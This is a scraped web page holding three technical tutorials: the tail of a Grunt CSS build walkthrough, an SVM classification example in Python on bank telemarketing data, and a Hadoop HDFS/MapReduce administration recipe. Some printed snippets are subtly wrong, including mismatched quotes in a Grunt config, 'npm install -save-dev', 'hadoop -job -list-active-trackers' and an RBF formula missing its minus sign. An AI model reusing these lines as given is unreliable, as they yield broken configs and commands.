insert the task into the list after cssmin: "watch": { "target": { "files": ["src/styles/myphoto.css"], "tasks": ["uncss", "cssmin", "processhtml"], "options": { "livereload": true } } } Next, we need to configure our cssmin task to use myphoto.min.css as input: "cssmin": { "target": { "files": { "dist/styles/myphoto.min.css": ["src/styles/myphoto.min.css"] } } }, Note how we removed src/styles/*.min.css, which would have prevented cssmin from reading files ending with the min.css extension. Running grunt watch and making a change to our myphoto.css file should now trigger the uncss task and then the cssmin task, resulting in console output indicating the successful execution of all tasks. This means that the console output should indicate that first uncss, cssmin, and then processhtml were successfully executed. Go ahead and check myphoto.min.css inside the dist folder. You should see how the following things were done: The CSS file contains an aggregation of all of our style sheets The CSS file is minified The CSS file contains no unused style rules However, you will also note that the dist folder contains none of our assets—neither images nor Bower components, nor our custom JavaScript files. As such, you will be forced to copy any assets manually. Of course, this is less than ideal. So let's see how we can copy our assets to our dist folder automatically. The dangers of using UnCSS UnCSS may cause you to lose styles that are applied dynamically. As such, care should be taken when using this tool. Take a closer look at the MyPhoto style sheet and see whether you spot any issues. You should note that our style rules for overriding the background color of our navigation pills were removed. One potential fix for this is to write a dedicated class for gray nav-pills (as opposed to overriding them with the Bootstrap classes). Deploying assets To copy our assets from src into dist, we will use grunt-contrib-copy. Visit https://github.com/gruntjs/grunt-contrib-copy for more on this. Go ahead and install it: npm install grunt-contrib-copy -save-dev Once installed, enable it by adding grunt.loadNpmTasks('grunt-contrib-copy'); to our Gruntfile.js. Then, configure the copy task: "copy": { "target": { "files": [ { "cwd": "src/images", "src": ["*"], "dest": "dist/images/", "expand": true }, { "cwd": "src/bower_components", "src": ["*"], "dest": "dist/bower_components/", "expand": true }, { "cwd": "src/js", "src": ["**/*"], "dest": "dist/js/", "expand": true }, ] } }, The preceding configuration should be self-explanatory. We are specifying a list of copy operations to perform: src indicates the source and dest indicates the destination. The cwd variable indicates the current working directory. Note how, instead of a wildcard expression, we can also match a certain src pattern. For example, to only copy minified JS files, we can write this: "src": ["*.min.js"] Take a look at the following screenshot: Figure 8.7: The console output indicating the number of copied files and directories after running the copy task Update the watch task: "watch": { "target": { 'files": ['src/styles/myphoto.css"], "tasks": ["uncss", "cssmin", "processhtml", "copy"] } }, Test the changes by running grunt watch. All tasks should execute successfully. The last task that was executed should be the copy task. Note that myphoto-hcm.css needs to be included in the process and copied to /dist/styles/, otherwise the HCM will not work. Try this yourself using the lessons learned so far! Stripping CSS comments Another common source for unnecessary bytes is comments. While needed during development, they serve no practical purpose in production. As such, we can configure our cssmin task to strip our CSS files of any comments by simply creating an options property and setting its nested keepSpecialComments property to 0: "cssmin": { "target":{ "options": { "keepSpecialComments": 0 }, "files": { "dist/src/styles/myphoto.min.css": ["src/styles /myphoto.min.css"] } } }, We saw how to use the build tool Grunt to automate the more common and mundane optimization tasks. To build responsive, dynamic, and mobile-first applications on the web with Bootstrap 4, check out this book Mastering Bootstrap 4 - Second Edition. Get ready for Bootstrap v4.1; Web developers to strap up their boots How to use Bootstrap grid system for responsive website design? Bootstrap 4 Objects, Components, Flexbox, and Layout  
Read more
  • 0
  • 0
  • 16014
article-image-support-vector-machines-classification-engine
Packt
17 Mar 2016
9 min read
Save for later

Support Vector Machines as a Classification Engine

Packt
17 Mar 2016
9 min read
In this article by Tomasz Drabas, author of the book, Practical Data Analysis Cookbook, we will discuss on how Support Vector Machine models can be used as a classification engine. (For more resources related to this topic, see here.) Support Vector Machines Support Vector Machines (SVMs) are a family of extremely powerful models that can be used in classification and regression problems. They aim at finding decision boundaries that separate observations with differing class memberships. While many classifiers exist that can classify linearly separable data (for example, logistic regression), SVMs can handle highly non-linear problems using a kernel trick that implicitly maps the input vectors to higher-dimensional feature spaces. The transformation rearranges the dataset in such a way that it is then linearly solvable. The mechanics of the machine Given a set of n points of a form (x1,y1)...(xn,yn), where xi is a z-dimensional input vector and  yi is a class label, the SVM aims at finding the maximum margin hyperplane that separates the data points: In a two-dimensional dataset, with linearly separable data points (as shown in the preceding figure), the maximum margin hyperplane would be a line that would maximize the distance between each of the classes. The hyperplane could be expressed as a dot product of the set of input vectors  x and a vector normal to the hyperplane W:W.X=b, where b is the offset from the origin of the coordinate system. To find the hyperplane, we solve the following optimization problem: The constraint of our optimization problem effectively states that no point can cross the hyperplane if it does not belong to the class on that side of the hyperplane. Linear SVM Building a linear SVM classifier in Python is easy. There are multiple Python packages that can estimate a linear SVM but here, we decided to use MLPY (http://mlpy.sourceforge.net): import pandas as pd import numpy as np import mlpy as ml First, we load the necessary modules that we will use later, namely pandas (http://pandas.pydata.org), NumPy (http://www.numpy.org), and the aforementioned MLPY. We use pandas to read the data (https://github.com/drabastomek/practicalDataAnalysisCookbook repository to download the data): # the file name of the dataset r_filename = 'Data/Chapter03/bank_contacts.csv' # read the data csv_read = pd.read_csv(r_filename) The dataset that we use was described in S. Moro, P. Cortez, and P. Rita. A data-driven approach to Predict the Success of Bank Telemarketing. Decision Support Systems, Elsevier, 62:22-31, June 2014 and found here http://archive.ics.uci.edu/ml/datasets/Bank+Marketing. It consists of over 41.1k outbound marketing calls of a bank. Our aim is to classify these calls into two buckets: those that resulted in a credit application and those that did not. Once the file was loaded, we split the data into training and testing datasets; we also keep the input and class indicator data separately. To this end, we use the split_dataset(...) method: def split_data(data, y, x = 'All', test_size = 0.33): ''' Method to split the data into training and testing ''' import sys # dependent variable variables = {'y': y} # and all the independent if x == 'All': allColumns = list(data.columns) allColumns.remove(y) variables['x'] = allColumns else: if type(x) != list: print('The x parameter has to be a list...') sys.exit(1) else: variables['x'] = x # create a variable to flag the training sample data['train'] = np.random.rand(len(data)) < (1 - test_size) # split the data into training and testing train_x = data[data.train] [variables['x']] train_y = data[data.train] [variables['y']] test_x = data[~data.train][variables['x']] test_y = data[~data.train][variables['y']] return train_x, train_y, test_x, test_y, variables['x'] We randomly set 1/3 of the dataset aside for testing purposes and use the remaining 2/3 for the training of the model: # split the data into training and testing train_x, train_y, test_x, test_y, labels = hlp.split_data( csv_read, y = 'credit_application' ) Once we read the data and split it into training and testing datasets, we can estimate the model: # create the classifier object svm = ml.LibSvm(svm_type='c_svc', kernel_type='linear', C=100.0) # fit the data svm.learn(train_x,train_y) The svm_type parameter of the .LibSvm(...) method controls what algorithm to use to estimate the SVM. Here, we use the c_svc method—a C-support Vector Classifier. The method specifies how much you want to avoid misclassifying observations: the larger values of C parameter will shrink the margin for the hyperplane (theb) so that more of the observations are correctly classified. You can also specify nu_svc with a nu parameter that controls how much of your sample (at most) can be misclassified and how many of your observations (at least) can become support vectors. Here, we estimate an SVM with a linear kernel, so let's talk about kernels. Kernels A kernel function K is effectively a function that computes a dot product between two n-dimensional vectors, K: Rn.Rn --> R. In other words, the kernel function takes two vectors and produces a scalar: The linear kernel does not effectively transform the data into a higher dimensional space. This is not true for polynomial or Radial Basis Function (RBF) kernels that transform the input feature space into higher dimensions. In case of the polynomial kernel of degree d, the obtained feature space has (n+d/d) dimensions for the Rn dimensional input feature space. As you can see, the number of additional dimensions can grow very quickly and this would pose significant problems in estimating the model if we would explicitly transform the data into higher dimensions. Thankfully, we do not have to do this as that's where the kernel trick comes into play. The truth is that SVMs do not have to work explicitly in higher dimensions but can rather implicitly map the data to higher dimensions using pairwise inner products (instead of an explicit dot product) and then use it to find the maximum margin hyperplane. You can find a really good explanation of the kernel trick at http://www.eric-kim.net/eric-kim-net/posts/1/kernel_trick.html. Back to our example The .learn(...) method of the .LibSvm(...) object estimates the model. Once the model is estimated, we can test how well it performs. First, we use the estimated model to predict the classes for the observations in the testing dataset: predicted_l = svm.pred(test_x) Next, we will use some of the scikit-learn methods to print the basic statistics for our model: def printModelSummary(actual, predicted): ''' Method to print out model summaries ''' import sklearn.metrics as mt print('Overall accuracy of the model is {0:.2f} percent' .format( (actual == predicted).sum() / len(actual) * 100)) print('Classification report: n', mt.classification_report(actual, predicted)) print('Confusion matrix: n', mt.confusion_matrix(actual, predicted)) print('ROC: ', mt.roc_auc_score(actual, predicted)) First, we calculate the overall accuracy of the model expressed as a ratio of properly classified observations to the total number of observations in the testing sample. Next, we print the classification report: The precision is the model's ability to avoid classifying an observation as positive when it is not. It is a ratio of true positives to the overall number of positively classified records. The overall precision score is a weighted average of the individual precision scores where the weight is the support. The support is the total number of actual observations in each class. The total precision for our model is not too bad—89 out of 100. However, when we look at the precision to classify the true positives, the situation is not as good—only 63 out of 100 were properly classified. Recall can be viewed as the model's capacity to find all the positive samples. It is a ratio of true positives to the sum of true positives and false negatives. The recall for the class 0.0 is almost perfect but for class 1.0, it looks really bad. This might be a problem with the fact that our sample is not balanced, but it is more likely that the features we use to classify the data do not really capture the differences between the two groups. The f1-score is effectively a weighted amalgam of the precision and recall: it is a ratio of twice the product of precision and recall to their sum. In one measure, it shows whether the model performs well or not. At the general level, the model does not perform badly but when looked at the model's ability to classify the true signal, it fails gravely. It is a perfect example why judging the model at the general level might be misleading when dealing with samples that are heavily unbalanced. RBF kernel SVM Given that the linear kernel performed poorly, our dataset might not be linearly separable. Thus, let's try the RBF kernel. The RBF kernel is given as K(x,y)=e ||x-y||2/2a2, where ||x-y||2 is a Euclidean distance between the two vectors, x and y, and σ is a free parameter. The value of RBF equals to 1 when x=y and gradually falls to 0 when the distance approaches infinity. To fit an RBF version of our model, we can specify our svm object as follows: svm = ml.LibSvm(svm_type='c_svc', kernel_type='rbf', gamma=0.1, C=1.0) The gamma parameter here specifies how far the influence of a single support vector reaches. Visually, you can investigate the relationship between gamma and C parameters at http://scikit-learn.org/stable/auto_examples/svm/plot_rbf_parameters.html. The rest of the code for the model estimation follows in a similar fashion as with the linear kernel and we obtain the following results: The results are even worse than the linear kernel as the precision and recall were lost across the board. The SVM with the RBF kernel performed worse when classifying calls that resulted in applying for the credit card and those that did not. Summary In this article, we saw that the problem is not with the model but rather, the dataset that we use does not explain the variance sufficiently. This requires going back to the drawing board and selecting other features. Resources for Article: Further resources on this subject: Push your data to the Web [article] Transferring Data from MS Access 2003 to SQL Server 2008 [article] Exporting data from MS Access 2003 to MySQL [article]
Read more
  • 0
  • 0
  • 16014

article-image-managing-hadoop-cluster
Packt
30 Aug 2013
13 min read
Save for later

Managing a Hadoop Cluster

Packt
30 Aug 2013
13 min read
(For more resources related to this topic, see here.) From the perspective of functionality, a Hadoop cluster is composed of an HDFS cluster and a MapReduce cluster . The HDFS cluster consists of the default filesystem for Hadoop. It has one or more NameNodes to keep track of the filesystem metadata, while actual data blocks are stored on distributed slave nodes managed by DataNode. Similarly, a MapReduce cluster has one JobTracker daemon on the master node and a number of TaskTrackers on the slave nodes. The JobTracker manages the life cycle of MapReduce jobs. It splits jobs into smaller tasks and schedules the tasks to run by the TaskTrackers. A TaskTracker executes tasks assigned by the JobTracker in parallel by forking one or a number of JVM processes. As a Hadoop cluster administrator, you will be responsible for managing both the HDFS cluster and the MapReduce cluster. In general, system administrators should maintain the health and availability of the cluster. More specifically, for an HDFS cluster, it means the management of the NameNodes and DataNodes and the management of the JobTrackers and TaskTrackers for MapReduce. Other administrative tasks include the management of Hadoop jobs, for example configuring job scheduling policy with schedulers. Managing the HDFS cluster The health of HDFS is critical for a Hadoop-based Big Data platform. HDFS problems can negatively affect the efficiency of the cluster. Even worse, it can make the cluster not function properly. For example, DataNode's unavailability caused by network segmentation can lead to some under-replicated data blocks. When this happens, HDFS will automatically replicate those data blocks, which will bring a lot of overhead to the cluster and cause the cluster to be too unstable to be available for use. In this recipe, we will show commands to manage an HDFS cluster. Getting ready Before getting started, we assume that our Hadoop cluster has been properly configured and all the daemons are running without any problems. Log in to the master node from the administrator machine with the following command: ssh hduser@master How to do it... Use the following steps to check the status of an HDFS cluster with hadoop fsck: Check the status of the root filesystem with the following command: hadoop fsck / We will get an output similar to the following: FSCK started by hduser from /10.147.166.55 for path / at Thu Feb 28 17:14:11 EST 2013 .. /user/hduser/.staging/job_201302281211_0002/job.jar: Under replicated blk_-665238265064328579_1016. Target Replicas is 10 but found 5 replica(s). .................................Status: HEALTHY Total size: 14420321969 B Total dirs: 22 Total files: 35 Total blocks (validated): 241 (avg. block size 59835360 B) Minimally replicated blocks: 241 (100.0 %) Over-replicated blocks: 0 (0.0 %) Under-replicated blocks: 2 (0.8298755 %) Mis-replicated blocks: 0 (0.0 %) Default replication factor: 2 Average block replication: 2.0248964 Corrupt blocks: 0 Missing replicas: 10 (2.0491803 %) Number of data-nodes: 5 Number of racks: 1 FSCK ended at Thu Feb 28 17:14:11 EST 2013 in 28 milliseconds The filesystem under path '/' is HEALTHY The output shows that some percentage of data blocks is under-replicated. But because HDFS can automatically make duplication for those data blocks, the HDFS filesystem and the '/' directory are both HEALTHY. Check the status of all the files on HDFS with the following command: hadoop fsck / -files We will get an output similar to the following: FSCK started by hduser from /10.147.166.55 for path / at Thu Feb 28 17:40:35 EST 2013 / <dir> /home <dir> /home/hduser <dir> /home/hduser/hadoop <dir> /home/hduser/hadoop/tmp <dir> /home/hduser/hadoop/tmp/mapred <dir> /home/hduser/hadoop/tmp/mapred/system <dir> /home/hduser/hadoop/tmp/mapred/system/jobtracker.info 4 bytes, 1 block(s): OK /user <dir> /user/hduser <dir> /user/hduser/randtext <dir> /user/hduser/randtext/_SUCCESS 0 bytes, 0 block(s): OK /user/hduser/randtext/_logs <dir> /user/hduser/randtext/_logs/history <dir> /user/hduser/randtext/_logs/history/job_201302281451_0002_13620904 21087_hduser_random-text-writer 23995 bytes, 1 block(s): OK /user/hduser/randtext/_logs/history/job_201302281451_0002_conf.xml 22878 bytes, 1 block(s): OK /user/hduser/randtext/part-00001 1102231864 bytes, 17 block(s): OK Status: HEALTHY Hadoop will scan and list all the files in the cluster. This command scans all ? les on HDFS and prints the size and status. Check the locations of file blocks with the following command: hadoop fsck / -files -locations The output of this command will contain the following information: The first line tells us that file part-00000 has 17 blocks in total and each block has 2 replications (replication factor has been set to 2). The following lines list the location of each block on the DataNode. For example, block blk_6733127705602961004_1127 has been replicated on hosts 10.145.231.46 and 10.145.223.184. The number 50010 is the port number of the DataNode. Check the locations of file blocks containing rack information with the following command: hadoop fsck / -files -blocks -racks Delete corrupted files with the following command: hadoop fsck -delete Move corrupted files to /lost+found with the following command: hadoop fsck -move Use the following steps to check the status of an HDFS cluster with hadoop dfsadmin: Report the status of each slave node with the following command: hadoop dfsadmin -report The output will be similar to the following: Configured Capacity: 422797230080 (393.76 GB) Present Capacity: 399233617920 (371.82 GB) DFS Remaining: 388122796032 (361.47 GB) DFS Used: 11110821888 (10.35 GB) DFS Used%: 2.78% Under replicated blocks: 0 Blocks with corrupt replicas: 0 Missing blocks: 0 ------------------------------------------------- Datanodes available: 5 (5 total, 0 dead) Name: 10.145.223.184:50010 Decommission Status : Normal Configured Capacity: 84559446016 (78.75 GB) DFS Used: 2328719360 (2.17 GB) Non DFS Used: 4728565760 (4.4 GB) DFS Remaining: 77502160896(72.18 GB) DFS Used%: 2.75% DFS Remaining%: 91.65% Last contact: Thu Feb 28 20:30:11 EST 2013 ... The first section of the output shows the summary of the HDFS cluster, including the configured capacity, present capacity, remaining capacity, used space, number of under-replicated data blocks, number of data blocks with corrupted replicas, and number of missing blocks. The following sections of the output information show the status of each HDFS slave node, including the name (ip:port) of the DataNode machine, commission status, configured capacity, HDFS and non-HDFS used space amount, HDFS remaining space, and the time that the slave node contacted the master. Refresh all the DataNodes using the following command: hadoop dfsadmin -refreshNodes Check the status of the safe mode using the following command: hadoop dfsadmin -safemode get We will be able to get the following output: Safe mode is OFF The output tells us that the NameNode is not in safe mode. In this case, the filesystem is both readable and writable. If the NameNode is in safe mode, the filesystem will be read-only (write protected). Manually put the NameNode into safe mode using the following command: hadoop dfsadmin -safemode enter This command is useful for system maintenance. Make the NameNode to leave safe mode using the following command: hadoop dfsadmin -safemode leave If the NameNode has been in safe mode for a long time or it has been put into safe mode manually, we need to use this command to let the NameNode leave this mode. Wait until NameNode leaves safe mode using the following command: hadoop dfsadmin -safemode wait This command is useful when we want to wait until HDFS finishes data block replication or wait until a newly commissioned DataNode to be ready for service. Save the metadata of the HDFS filesystem with the following command: hadoop dfsadmin -metasave meta.log The meta.log file will be created under the directory $HADOOP_HOME/logs. Its content will be similar to the following: 21 files and directories, 88 blocks = 109 total Live Datanodes: 5 Dead Datanodes: 0 Metasave: Blocks waiting for replication: 0 Metasave: Blocks being replicated: 0 Metasave: Blocks 0 waiting deletion from 0 datanodes. Metasave: Number of datanodes: 5 10.145.223.184:50010 IN 84559446016(78.75 GB) 2328719360(2.17 GB) 2.75% 77502132224(72.18 GB) Thu Feb 28 21:43:52 EST 2013 10.152.166.137:50010 IN 84559446016(78.75 GB) 2357415936(2.2 GB) 2.79% 77492854784(72.17 GB) Thu Feb 28 21:43:52 EST 2013 10.145.231.46:50010 IN 84559446016(78.75 GB) 2048004096(1.91 GB) 2.42% 77802893312(72.46 GB) Thu Feb 28 21:43:54 EST 2013 10.152.161.43:50010 IN 84559446016(78.75 GB) 2250854400(2.1 GB) 2.66% 77600096256(72.27 GB) Thu Feb 28 21:43:52 EST 2013 10.152.175.122:50010 IN 84559446016(78.75 GB) 2125828096(1.98 GB) 2.51% 77724323840(72.39 GB) Thu Feb 28 21:43:53 EST 2013 21 files and directories, 88 blocks = 109 total ... How it works... The HDFS filesystem will be write protected when NameNode enters safe mode. When an HDFS cluster is started, it will enter safe mode first. The NameNode will check the replication factor for each data block. If the replica count of a data block is smaller than the configured value, which is 3 by default, the data block will be marked as under-replicated. Finally, an under-replication factor, which is the percentage of under-replicated data blocks, will be calculated. If the percentage number is larger than the threshold value, the NameNode will stay in safe mode until enough new replicas are created for the under-replicated data blocks so as to make the under-replication factor lower than the threshold. We can get the usage of the fsck command using: hadoop fsck The usage information will be similar to the following: Usage: DFSck <path> [-move | -delete | -openforwrite] [-files [-blocks [-locations | -racks]]] <path> start checking from this path -move move corrupted files to /lost+found -delete delete corrupted files -files print out files being checked -openforwrite print out files opened for write -blocks print out block report -locations print out locations for every block -racks print out network topology for data-node locations By default fsck ignores files opened for write, use -openforwrite to report such files. They are usually tagged CORRUPT or HEALTHY depending on their block allocation status.   We can get the usage of the dfsadmin command using: hadoop dfsadmin The output will be similar to the following: Usage: java DFSAdmin [-report] [-safemode enter | leave | get | wait] [-saveNamespace] [-refreshNodes] [-finalizeUpgrade] [-upgradeProgress status | details | force] [-metasave filename] [-refreshServiceAcl] [-refreshUserToGroupsMappings] [-refreshSuperUserGroupsConfiguration] [-setQuota <quota> <dirname>...<dirname>] [-clrQuota <dirname>...<dirname>] [-setSpaceQuota <quota> <dirname>...<dirname>] [-clrSpaceQuota <dirname>...<dirname>] [-setBalancerBandwidth <bandwidth in bytes per second>] [-help [cmd]] There's more… Besides using command line, we can use the web UI to check the status of an HDFS cluster. For example, we can get the status information of HDFS by opening the link http://master:50070/dfshealth.jsp. We will get a web page that shows the summary of the HDFS cluster such as the configured capacity and remaining space. For example, the web page will be similar to the following screenshot: By clicking on the Live Nodes link, we can check the status of each DataNode. We will get a web page similar to the following screenshot: By clicking on the link of each node, we can browse the directory of the HDFS filesystem. The web page will be similar to the following screenshot: The web page shows that file /user/hduser/randtext has been split into five partitions. We can browse the content of each partition by clicking on the part-0000x link. Configuring SecondaryNameNode Hadoop NameNode is a single point of failure. By configuring SecondaryNameNode, the filesystem image and edit log files can be backed up periodically. And in case of NameNode failure, the backup files can be used to recover the NameNode. In this recipe, we will outline steps to configure SecondaryNameNode. Getting ready We assume that Hadoop has been configured correctly. Log in to the master node from the cluster administration machine using the following command: ssh hduser@master How to do it... Perform the following steps to configure SecondaryNameNode: Stop the cluster using the following command: stop-all.sh Add or change the following into the file $HADOOP_HOME/conf/hdfs-site.xml: <property> <name>fs.checkpoint.dir</name> <value>/hadoop/dfs/namesecondary</value> </property> If this property is not set explicitly, the default checkpoint directory will be ${hadoop.tmp.dir}/dfs/namesecondary. Start the cluster using the following command: start-all.sh The tree structure of the NameNode data directory will be similar to the following: ${dfs.name.dir}/ ├── current │ ├── edits │ ├── fsimage │ ├── fstime │ └── VERSION ├── image │ └── fsimage ├── in_use.lock └── previous.checkpoint ├── edits ├── fsimage ├── fstime └── VERSION And the tree structure of the SecondaryNameNode data directory will be similar to the following: ${fs.checkpoint.dir}/ ├── current │ ├── edits │ ├── fsimage │ ├── fstime │ └── VERSION ├── image │ └── fsimage └── in_use.lock There's more... To increase redundancy, we can configure NameNode to write filesystem metadata on multiple locations. For example, we can add an NFS shared directory for backup by changing the following property in the file $HADOOP_HOME/conf/hdfs-site.xml: <property> <name>dfs.name.dir</name> <value>/hadoop/dfs/name,/nfs/name</value> </property> Managing the MapReduce cluster A typical MapReduce cluster is composed of one master node that runs the JobTracker and a number of slave nodes that run TaskTrackers. The task of managing a MapReduce cluster includes maintaining the health as well as the membership between TaskTrackers and the JobTracker. In this recipe, we will outline commands to manage a MapReduce cluster. Getting ready We assume that the Hadoop cluster has been properly configured and running. Log in to the master node from the cluster administration machine using the following command: ssh hduser@master How to do it... Perform the following steps to manage a MapReduce cluster: List all the active TaskTrackers using the following command: hadoop -job -list-active-trackers This command can help us check the registration status of the TaskTrackers in the cluster. Check the status of the JobTracker safe mode using the following command: hadoop mradmin -safemode get We will get the following output: Safe mode is OFF The output tells us that the JobTracker is not in safe mode. We can submit jobs to the cluster. If the JobTracker is in safe mode, no jobs can be submitted to the cluster. Manually let the JobTracker enter safe mode using the following command: hadoop mradmin -safemode enter This command is handy when we want to maintain the cluster. Let the JobTracker leave safe mode using the following command: hadoop mradmin -safemode leave When maintenance tasks are done, you need to run this command. If we want to wait for safe mode to exit, the following command can be used: hadoop mradmin -safemode wait Reload the MapReduce queue configuration using the following command: hadoop mradmin -refreshQueues Reload active TaskTrackers using the following command: hadoop mradmin -refreshNodes How it works... Get the usage of the mradmin command using the following: hadoop mradmin The usage information will be similar to the following: Usage: java MRAdmin [-refreshServiceAcl] [-refreshQueues] [-refreshUserToGroupsMappings] [-refreshSuperUserGroupsConfiguration] [-refreshNodes] [-safemode <enter | leave | get | wait>] [-help [cmd]] ... The meaning of the command options is listed in the following table: Option Description -refreshServiceAcl Force JobTracker to reload service ACL. -refreshQueues Force JobTracker to reload queue configurations. -refreshUserToGroupsMappings Force JobTracker to reload user group mappings. -refreshSuperUserGroupsConfiguration Force JobTracker to reload super user group mappings. -refreshNodes Force JobTracker to refresh the JobTracker hosts. -help [cmd] Show the help info for a command or all commands. Summary In this article, we learned Managing the HDFS cluster, configuring SecondaryNameNode, and managing the MapReduce cluster. As a Hadoop cluster administrator, as the system administrator is responsible for managing both the HDFS cluster and the MapReduce cluster, he/she must be aware of how to manage these in order to maintain the health and availability of the cluster. More specifically, for an HDFS cluster, it means the management of the NameNodes and DataNodes and the management of the JobTrackers and TaskTrackers for MapReduce, which is covered in this article. Resources for Article : Further resources on this subject: Analytics – Drawing a Frequency Distribution with MapReduce (Intermediate) [Article] Advanced Hadoop MapReduce Administration [Article] Understanding MapReduce [Article]
Read more
  • 0
  • 0
  • 16010
Modal Close icon
Modal Close icon